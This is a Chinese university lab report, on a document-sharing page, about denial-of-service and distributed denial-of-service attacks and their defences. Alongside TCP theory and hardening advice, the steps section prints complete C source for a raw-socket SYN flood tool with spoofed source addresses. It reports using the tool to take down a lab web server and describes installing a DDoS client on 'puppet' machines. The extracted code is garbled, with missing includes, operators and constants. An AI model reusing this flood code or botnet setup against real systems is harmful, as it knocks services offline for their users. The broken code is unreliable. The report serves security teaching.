实验10-拒绝服务攻击与防范_第1页
实验10-拒绝服务攻击与防范_第2页
实验10-拒绝服务攻击与防范_第3页
实验10-拒绝服务攻击与防范_第4页
实验10-拒绝服务攻击与防范_第5页
已阅读5页,还剩16页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、精选优质文档-倾情为你奉上贵州大学实验报告学院:计算机科学与技术学院 专业:信息安全 班级:姓名学号实验组实验时间2015.06.17指导教师蒋朝惠成绩实验项目名称实验十 拒绝服务攻击与防范实验目的(一) 拒绝服务(DoS)攻击与防范通过本实验的学习, 使大家了解拒绝服务攻击的原理以及相应的防范方法。通过一个SYN Flood的拒绝服务程序, 使大家加强对Dos攻击的理解。(二) 分布式服务(DDoS)攻击与防范通过本实验的学习, 使大家了解分布式拒绝服务(DDoS)攻击的原理以及相应的防范方法。实验要求通过实验,理解和掌握DoS和DDoS的攻击原理以及相应的防范方法实验原理(一) 拒绝服务(

2、DoS)攻击与防范1. TCP协议介绍传输控制协议是用来在不可靠的Internet上提供可靠的、端到端的字节流通信协议,在FRC 793中有正式定义,还有一些解决错误的方案在RFC1122中有记录,RFC1323则有TCP的功能扩展。常见到的TCP/IP协议中,IP层不保证将数据报正确传输到目的地TCP则从本地机器接收用户的数据流,将其分成不超过64KB的数据字段,将每个数据片段作为单独的IP数据包发送出去,最后在目的地机器中将其再组合成完整的字节流,TCP协议必须保证可靠性。发送方和接收方的TCP传输以数据段的形式交换数据,i一个数据段包括固定20字节,加上可选部分,后面再加上数据。TCP协

3、议从发送方传输一个数据耳朵时候,其中有一个确认号,它等于希望收到的下一个数据段的序号,接收方还要发送回一个数据段,其中有一个确认号,它等于希望收到的下一个数据段的顺序号。如果计时器在确认信息到达以前超时了,发送方会重新发送这个数据段。从上面的内容可以在总体上了解一点TCP,重要的是熟悉TCP的数据头。因为数据流的传输最重要的就是header里面的东西,至于发送的数据,只是TCP数据头附带上的、客户端和服务器端的服务响应就是痛header里面的数据有关,两端信息交流和交换是根据header中内容实施的,因此,要了解DoS攻击原理,就必须对TCP的header中的内容非常熟悉。有关TCP数据段头格

4、式参见7.1.3节内容。TCP连接采用“3次握手”,其原理步骤如下所述。在没有连接时,接受方服务器处于监听状态,等待其它机器发送连接请求。第一步,客户端发送一个带SYN位的请求,向服务器表示需要连接。第二步,服务器接收到这样的请求后,查看监听的端口是否为指定端口,如果不是,则发送RST=1应答,拒绝建立连接。如果是,那么服务器发送确认,SYN为服务器的一个内码,假设为100,ACK位则为客户端的请求序号加1,本例中发送的数据是:SYN=11,ACK=100,用这样的数据发送给客户端。向客户端标明,服务器连接已准备好,等待客户端的确认。这时客户端接收到信息后,分析得到的信息,准备发送确认连接信号

5、到服务器。第三步,客户端发送确认信息建立连接的消息给服务器端,确认信息的SYN位是服务器发送的ACK位,ACK位是服务器发送的SYN位加1.级:SYN=11,ACK=101。这时,连接已经建立好了,可以进行发送数据的过程。服务器不会在每次接收到SYN请求就立刻恢复客户端建立连接,而是为连接请求分配内存空间,建立会话,并放到一个队列中。如果等待队列已经满了,那么服务器就不会再为新的连接分配资源,直接丢弃请求。如果到了这种地步,那么服务器就是拒绝服务了。2. 拒绝服务(DoS)攻击(1)DoS的基本概念DoS的英文全称是denial of service,也就是“拒绝服务”的意思。从网络攻击的各种

6、方法和所产生的破坏情况来看,DOS算是一种很简单但又很有效的攻击方式。它的目的就是拒绝服务访问,破坏服务程序正常运行,最终它会使部分Internet连接和网络系统失效。DoS的攻击方式有很多种,最基本的DoS攻击就是利用合理的服务请求来占用过多的资源,从而使合法用户无法得到服务。DoS攻击的基本过程是:攻击者向服务器发送众多的带有虚假地址请求,服务器发送回复请求后等待回传信息,由于地址是伪造的,所以服务器一直等不到回传的消息,分配给这次请求的资源就始终没被释放。当服务器等待一段时间后,连接会因超时而呗切断,攻击者会再传送一批新的请求,在这种反复发送伪地址请求的情况下,服务器资源会最终被耗尽。被

7、DOS攻击事的现象大致有:被攻击主机上有大量等待的TCP连接。被攻击主机的系统资源被大量占用,造成系统停顿。网络充斥着大量无用的数据包,源地址为伪造地址。大量无用数据使得网络拥塞,受害主机无法与外界进行通信。利用受害主机提供的服务或传输协议上的缺陷,反复高速地发送特定的服务请求,使受害主机无法及时处理所有正常请求,严重时会造成系统崩溃。(2)拒绝服务攻击的基本方法要对服务器实现拒绝服务攻击,实质上有两种方式:一是迫使服务器的缓冲区满,不接受新的请求;二是使用IP欺骗,迫使服务器把合法的连接复位,影响合法用户的连接。这就是DoS攻击实施的基本思想。具体实现有一下几种方法:SNY Flood。编写

8、发包程序,设置TCP的Header,向服务器端不断成倍地发送只有SYN标志的TCP请求。当服务器接收的时候,都认为是没有建立起来的连接请求,于是为这些请求建立会话,排到缓冲队列中。如果SYN请求超过了服务器能容纳的限度,缓冲区队列占满,那么服务器就不再接收新请求了,其他合法用户的连接都被拒绝掉。IP欺骗DoS攻击。这种攻击利用RST位来实现。假设现在只有有一个合法用户()已经同服务器建立了正常的连接,攻击者构造攻击的TCP数据,伪装自己的IP为,并向服务器发送一个带有RST位的TCP数据段。服务器接收到这样的数据后。认为从发送的连接错误,就会清空缓冲区

9、中建好的连接。这时。如果合法用户再发送合法数据;服务器就已经没有这样的连接了,该用户就必须重新开始建立连接。使用这种攻击方式时,需要伪造大量的IP地址,向目标发送RST数据,可以使服务器不对合法用户服务。Smurf。广播信息可以通过一定的手段发送到整个网络机器中。当某台机器使用广播地址发送一个ICMP echo 请求包时,一些系统会回应一个ICMP echo回应包。自身消耗的DoS攻击。这种DoS攻击就是把请求数据包中的客户端IP和端口设置成主机自己IP和端口,再发送给主机,使得主机给自己发送TCP相应和连接。这样,主机就会很快把资源耗光,直接导致死机。这种伪装攻击对一些身份认证

10、系统威胁巨大。塞满服务器的硬盘。通常,如果服务器可以没有限制地执行写操作;那么通过一些手段就可以造成硬盘被写满,从而拒绝服务;比如发送垃圾邮件。合理利用策略。一般服务器都有关于账户锁定的安全策略,比如某个账户连续3次登陆失败,那么这个账号将被锁定。这点也可以被破坏者利用,他们伪装一个账号去错误登陆,这样使得这个账号被锁定,而正常的合法用户就不能使用账号去登陆系统了。(3)拒绝服务攻击的防范到目前为止,防范DoS特别是DDoS攻击仍比较困难。但仍然可以采取一些措施以降低其产生的危害。对中小型网站来说,可以从以下几个方面进行防范:主机设置。即加固操作系统,对各操作系统参数进行设置以加强系统稳固性。

11、重新编译或设置Linux以及操作各种BSD系统、Solaris等操作系统内核中某些参数,可在一定程度上提高系统的抗攻击能力。例如,对于DoS攻击的典型种类SYN Flood,它利用TCP/IP漏洞发送大量伪造的TCP连接请求,以造成网络无法连接用户服务或使操作系统瘫痪。该攻击过程涉及系统的一下参数:可等待的数据包的链接数和超时等待数据包的时间长度。因此,则进行如下设置:关闭不必要的服务。将数据包的链接数从默认值128或512改为2048或更大,以家常每次处理数据包队列的长度;以缓解和消化更多数据包的连接。将连接超时时间设置得较短,以保证正常数据包的连接,屏蔽非法攻击包。及时更新系统、安装补丁。

12、防火墙设置。仍以SYN Flood为例,可以在在防火墙上进行如下设置:禁止对主机非开放服务的访问。限制同时打开的数据包最大连接数。限制特定IP地址的访问。启用防火墙的防DDoS的属性。严格限制对外开放服务器的向外访问,以防止自己服务器被当作工具攻击他人。Random Drop算法。当流量达到一定阀值时,按照算法规则丢弃后续报文,以保持主机的处理能力。其不足是会误丢正常的数据包,特别是在大流量数据包的攻击下,正常数据包容易随非法数据包被拒之网外。SYN Cookie算法。采用“六次握手”技术以降低受攻击率。其不足是依据列表查询,当数据流量增大时,列表急剧膨胀,计算量随之提升,容易造成响应延迟乃至

13、系统瘫痪。路由器设置。以CISCO路由器为例,可采取如下方法。Cisco Express Forwarding(CEF)。使用Unicasat reverse-path。访问控制列表(ACL)过滤。设置数据流量速率。升级版本过低的IOS。为路由器建立log server。不论防火墙还是路由器都是到外界的接口设备,在进行防DDoS设置的同时,要权衡可能牺牲的正常业务代价,谨慎行事。利用负载均衡技术。就是把应用业务分部到几台不同的服务器上。采用循环DNS服务或者硬件路由器技术,将进入系统的请求分流到多台服务器上。这种方法要求投资较大,相应的维护费也高,中型网站如果有条件可以考虑。以上方法对流量小、

14、正对性强、结构简单的DoS攻击进行防范还是很有效的。而对于DDoS攻击,则需要能够应付大流量的防范措施和技术,需要能够综合多种算法、集多种网络设备功能的集成技术。(二) 分布式服务(DDoS)攻击与防范1. DDoS的基本概念分布式拒绝服务攻击时借助于客户服务器技术,将多个计算机联合起来作为攻击平台,对一个活活在多个目标发动攻击,使成倍的增加攻击能力。2. DDoS的攻击原理(1) Smurf与Fraggle 将一个目的地址设置成广播地址后,它就会被网络中的所有主机接收并处理。其中Smurf是用广播地址发送ICMP ECHO包,而Fraggle是用广播地址发送UDP包。(2) trinoo 是

15、复杂的DDoS攻击程序,它使用主控程序master对实际实施攻击的任何数量的“代理”程序实现自动控制。(3) TFN2K 是一个使用master程序与位于多个网络上的哦国内国际代理进行通信。(4) Stacheldraht 也是基于TFN的,采用C/S模式,其中master程序与潜在的成千上万个代理程序进行通信。3. DDoS系统的一般结构在更一般的情况下,DDoS可能使用多台控制机,形成一个攻击结构。4. DDoS的监测(1) 根据异常情况分析(2) 使用DDoS检测工具5. DDoS攻击的防御策略实验仪器(一) 拒绝服务(DoS)攻击与防范1. 安装有Windows操作系统的PC,编辑工具

16、可选用VC+ 6.0。2. 由hub或交换机组成的有若干台PC局域网。(二) 分布式服务(DDoS)攻击与防范Windows server 2003,风云压力测试DDoS软件,冰盾防火墙实验步骤、内容、数据(一) 拒绝服务(DoS)攻击与防范1. 在一个局域网环境中,根据实验内容中提供的DoS程序,编写一个SYN Flood拒绝服务程序。使用自己编写的DoS程序攻击实验室的一台实验主机,在实验主机上安装一个网络监听工具(如tcpdump等),观测DoS攻击效果。2. 交自己编辑的SYN Flood拒绝服务攻击程序猿代码,并对代码中的关键步骤添加注释,通过网络监听工具观测攻击效果,并对实验结果进

17、行分析。3. SYN Flood程序如下:#include #include #include #include #include #include #pragma comment(lib, ws2_32.lib)#define MAX_RECEIVEBYTE 255 typedef struct ip_head /定义IP首部 unsigned char h_verlen; /4位首部长度,4位IP版本号 unsigned char tos; /8位服务类型TOS unsigned short total_len; /16位总长度(字节) unsigned short ident; /16位

18、标识 unsigned short frag_and_flags; /3位标志位 (如SYN,ACK,等)unsigned char ttl; /8位生存时间 TTL unsigned char proto; /8位协议 (如ICMP,TCP等)unsigned short checksum; /16位IP首部校验和unsigned int sourceIP; /32位源IP地址unsigned int destIP; /32位目的IP地址 IPHEADER;typedef struct tcp_head /定义TCP首部 USHORT th_sport; /16位源端口 USHORT th_

19、dport; /16位目的端口 unsigned int th_seq; /32位序列号 unsigned int th_ack; /32位确认号 unsigned char th_lenres; /4位首部长度/6位保留字 unsigned char th_flag; /6位标志位 USHORT th_win; /16位窗口大小 USHORT th_sum; /16位校验和 USHORT th_urp; /16位紧急数据偏移量 TCPHEADER; typedef struct tsd_head /定义TCP伪首部 unsigned long saddr; /源地址 unsigned lon

20、g daddr; /目的地址 char mbz; char ptcl; /协议类型 unsigned short tcpl; /TCP长度 PSDHEADER;/CheckSum:计算校验和的子函数 USHORT checksum(USHORT *buffer, int size) unsigned long cksum=0; while(size 1) cksum+=*buffer+;size -=sizeof(USHORT); if(size)cksum += *(UCHAR*)buffer; cksum = (cksum 16) + (cksum & 0xffff); cksum +=

21、(cksum 16);return (USHORT)(cksum); void usage() printf(*);printf(SYN_FLOOD MADE BY LionD8);printf(Useage: FLOOD Target_ip Target_port Delay_time );printf(*);/Delay_time单位为毫秒。int main(int argc, char* argv) WSADATA WSAData; SOCKET sock; SOCKADDR_IN addr_in;IPHEADER ipHeader;TCPHEADER tcpHeader;PSDHEAD

22、ER psdHeader;int SourcePort;char szSendBuf60=0;BOOL flag; int rect,nTimeOver;int sleeptime;usage();if (argc 4 ) printf(input error! );return false; if (argc=4) sleeptime=atoi(argv3); else sleeptime=300;if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0) printf(WSAStartup Error!);return false;sock=NULL;if (s

23、ock=socket(AF_INET,SOCK_RAW,IPPROTO_IP)=INVALID_SOCKET)printf(Socket Setup Error!);return false;flag=true; if (setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag)=SOCKET_ERROR) printf(setsockopt IP_HDRINCL error!);return false; nTimeOver=1000;if (setsockopt(sock, SOL_SOCKET, SO_SNDTIME

24、O, (char*)&nTimeOver, sizeof(nTimeOver)=SOCKET_ERROR) /设置发送的时间 printf(setsockopt SO_SNDTIMEO error!);return false; addr_in.sin_family=AF_INET; addr_in.sin_port=htons(atoi(argv2);addr_in.sin_addr.S_un.S_addr=inet_addr(argv1);while(TRUE)/填充IP首部 ipHeader.h_verlen=(44 | sizeof(ipHeader)/sizeof(unsigned

25、long);ipHeader.tos=0;ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader); /IP总长度ipHeader.ident=1;ipHeader.frag_and_flags=0; /无分片ipHeader.ttl=(unsigned char)GetTickCount()%87+123; ipHto=IPPROTO_TCP; / 协议类型为 TCPipHeader.checksum=0; /效验位先初始为0ipHeader.sourceIP=htonl(GetTickCount()*); /随

26、机产生一个伪造的IPipHeader.destIP=inet_addr(argv1); /目标IP/填充TCP首部SourcePort=GetTickCount()*43557%9898; /随机产生一个端口号tcpHeader.th_dport=htons(atoi(argv2); /发送的目的端口tcpHeader.th_sport=htons(SourcePort); /源端口号tcpHeader.th_seq=htonl(0x); /序列号tcpHeader.th_ack=0; /确认号tcpHeader.th_lenres=(sizeof(tcpHeader)/44|0);tcpHe

27、ader.th_flag=2; /为SYN请求tcpHeader.th_win=htons(512);tcpHeader.th_urp=0;tcpHeader.th_sum=0;/填充TCP伪首部用来计算TCP头部的效验和psdHeader.saddr=ipHeader.sourceIP;psdHeader.daddr=ipHeader.destIP;psdHeader.mbz=0; psdHeader.ptcl=IPPROTO_TCP;psdHeader.tcpl=htons(sizeof(tcpHeader);/计算校验和 memcpy(szSendBuf, &psdHeader, siz

28、eof(psdHeader); memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader); tcpHeader.th_sum=checksum(USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader); /把伪造好的IP头 和 TCP 头 放进 buf 准备发送memcpy(szSendBuf, &ipHeader, sizeof(ipHeader);memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHea

29、der);/发送数据包rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader), 0, (struct sockaddr*)&addr_in, sizeof(addr_in);if (rect=SOCKET_ERROR) printf(send error!:%x,WSAGetLastError();return false;elseprintf(send ok!);Sleep(sleeptime); /根据自己网速的快慢确定此值,sleeptime越小发得越快/endwhile /重新伪造IP的源地址等再次向目标发送clo

30、sesocket(sock);WSACleanup();return 0;4. 运行代码得到如下可执行文件:5. 攻击之前,将一台web服务器的服务端口改为1234,如下:6. 访问上面的web服务器如下:7. DoS攻击:8. 最后一个参数60,表示每60ms发送一次,回车后:9. 每60 ms显示一个send ok!表示发送成功。DoS攻击之后,访问之前的web服务器,出现如下情况:表明DOS攻击成功!(二) 分布式服务(DDoS)攻击与防范C1(攻击者)上安装DDoS客户端程序,C2C6(傀儡机)上安装DDoS服务器端,C7(被攻击者)上安装启用冰盾DDoS防火墙,C8(被攻击者)上不使用防火墙。1. C1下载风云压力测试软件,解压后可看见目录下有一生成器文件2. 单击【生成版本】,生成客户端和服务器端软件3. 在装服务器端Service.exe的计算机的host文件最后加入相应域名的客户机IP: 4. 在服务器(C2C6)装上Service.exe,在客户端C1装上“风云vip客户端”。C1(攻击者)单击“开始监听”,攻击目标输入C8(不使用防火墙)ip:35. 使用SYN

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论